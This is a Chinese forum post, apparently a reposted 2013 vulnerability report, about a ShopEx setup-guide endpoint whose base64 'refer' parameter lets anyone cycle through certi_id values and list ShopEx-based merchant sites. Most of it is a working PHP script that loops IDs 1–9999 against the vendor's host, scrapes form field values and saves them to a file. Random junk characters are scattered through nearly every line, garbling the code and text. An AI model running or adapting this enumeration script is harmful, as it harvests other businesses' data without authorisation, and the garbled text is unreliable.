|
|
简要描述:. i4 s1 u& g; {
ShopEx某接口缺陷,可遍历所有网站, }! N3 U5 q4 C& |2 ?
详细说明:5 R8 P* h2 m- W1 B
问题出现在shopex 网店使用向导页面
# U8 o( z; r* V& @
7 A' v( {, V1 r7 O+ i4 j. Z1 [7 N! K R4 f+ I- L8 _3 k6 K( H
/ W4 t# H/ n7 j+ ]% C" F% shttp://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
1 R' j' o$ t* M6 ~) _' N
S6 q M0 b; q* B$ q3 f: n" i7 w+ S% f) C
) N% S9 W5 z" e5 ]! p: T+ V, W
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
, C/ ~& \4 \2 k1 O% j8 R" I) V( Y* z, h4 m7 F
+ t1 r# `8 x$ f$ Y7 f% D; j# T; V5 H& {& U/ Q) y
我们修改certi_id 即可遍历所有使用了ShopEx程序的网站
$ e5 D9 r3 C4 `' V( @; [
; Z- T {. O' u! W
' O+ V' z& B$ x8 }$ C( |
/ C, u9 ?/ r% |' ^<?php
9 ]' `$ p) f) p% I, x# x
4 i0 g$ {7 Z! U for ($i=1; $i < 10000; $i++) { //遍历; x) S M) O+ W
& f) P6 C7 B1 P ShowshopExD($i);% c# v7 d7 j* \2 P$ j
2 D$ {& Q1 z& q# T2 R }( O" C. d0 E9 }9 h1 k' A; P
; c* Y1 j! v' u# u! u, W0 R' }$ U
function ShowshopExD($cid) {
; Z X+ b- G, Y/ O
" |4 P2 O0 S: ]1 }. e% n$ O( t- o $url='http://guide.ecos.shopex.cn/step2.php';2 ?" Q# s* C$ B
1 O4 u2 J& y- p $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');3 E) x2 r1 T; m1 T+ E6 E) I2 ^
4 V4 l2 d) L. g, O! c$ w5 p/ Q) s$ c $url = $url.'?refer='.$refer;
( b6 u/ e1 O0 ~& ^! F) @6 s) a6 u: Z$ u9 M* ]8 F7 [ V [
$ch = curl_init($url);9 X# a8 r0 D! T5 Z8 o/ ]
5 _' V. T$ c) P- Q5 `) n curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
& |4 Q( ~1 ^5 a# X& u
9 x. o: x+ C Q0 A9 t' h curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;$ w) F$ q- ?1 J2 |% k8 S
) A! `. Y" W* k% Y/ x
$result = curl_exec($ch);
- E0 g( L2 p- t& I5 m
- w: v5 O$ N* ` V/ ~8 u) o $result = mb_convert_encoding($result, "gb2312", "UTF-8");
2 o' t4 Z# B3 a1 b$ v
; x. \( ^9 o' O. N if(strpos($result,$refer))
}% |& y7 J; k. a! ]" l& f6 h1 o$ x- q* d" C7 t z# V _8 L# X5 ?) Q
{
) v2 M8 Q% y: ~! x5 o1 a( ?( H) G, z
$fp = fopen("c:/shopEx.txt",'ab'); //保存文件" {" Q( k( W$ `
6 x/ ~, B: Z2 W7 V1 \ K7 z4 |
preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);
+ }$ \* N6 q8 N3 b: V& \$ e. G) a9 [
/ H8 h& b5 W o: ~ foreach ($value[1] as $key) {; D* b5 y/ U7 g7 c. }( O
. ?- i/ _8 [& x/ t5 b5 W
preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);1 X3 d% b7 _: s! M. h: K5 t
, W2 ~# n9 U- I) y( ^1 F# B/ T1 A. Z echo $res[1][0].':'.$res[3][0]."\r\n";. `* d5 m# X0 c+ l
( W; {4 Z) @; @5 L' s
$col =$res[1][0].':'.$res[3][0]."\r\n";
0 G" i& g4 d, U0 ?9 u; v* m1 X0 ]0 t- p0 U6 a; ^+ d9 T3 k
fwrite($fp, $col, strlen($col));
7 R2 y p& X4 Z/ G4 D. i% B5 |6 g( x9 A- O
}
$ S, z# |) Q% \. j+ V8 c0 [6 \" Q3 a6 }( C1 ~$ Z
echo '--------------------------------'."\r\n";
9 ]" R! j# D& m+ V
1 w9 K. ]% } N: K8 P" S fclose($fp); - O- x! ]# {% }* q/ I9 m
; ?* T8 P3 T6 Z; x1 O }
% U9 e, A; S. S; H6 m" _/ j+ Y9 e$ h: e4 u
flush();
( F: }0 ?0 ^( |4 z5 a
+ t" S d: |! e8 X. A3 O curl_close($ch);% \& a' ^5 Z* P2 ^0 H4 P9 L
0 d, i* d% z N0 a1 S }
, d6 t% U+ f# F! n1 s8 J3 @; r4 ]4 t, {: z$ C, t( e
?>
/ Z6 l; }# B" l3 G* V漏洞证明:
& P0 H4 m) ?* x: t1 D% Yhttp://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg8 B8 o$ _: U* }6 v7 @
refer换成其他加密方式
* Q6 ^$ {) v. X0 z; _! v |
|
发表于 2013-9-21 15:59:47
收藏
分享
支持
反对